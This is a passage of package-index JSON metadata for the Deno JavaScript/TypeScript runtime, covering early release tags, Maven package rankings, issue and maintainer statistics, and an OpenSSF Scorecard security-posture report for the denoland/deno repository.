"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T10:14:52.883Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.673509187807873,"dependent_packages_count":42.42110430437969,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.04730674609378},"purl":"pkg:maven/org.mvnpm.at.deno/linux-arm64-glibc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:linux-arm64-glibc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:linux-arm64-glibc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:linux-arm64-glibc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-arm64-glibc/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620154,"maintainers_count":0,"namespaces_count":82381,"keywords_count":36851,"github":"maven-central","metadata":{"funded_packages_count":48065,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-01T05:04:44.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4327637,"name":"deno","ecosystem":"deno","description":"A modern runtime for JavaScript and TypeScript.","homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":303,"first_release_published_at":"2020-07-29T19:59:08.205Z","latest_release_published_at":"2025-08-21T12:18:02.362Z","latest_release_number":"v2.4.5","last_synced_at":"2026-08-29T21:56:47.484Z","created_at":"2022-04-21T03:02:16.651Z","updated_at":"2026-08-31T11:44:11.695Z","registry_url":"https://deno.land/x/deno","install_command":null,"documentation_url":"https://doc.deno.land/https://deno.land/x/deno/mod.ts","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines 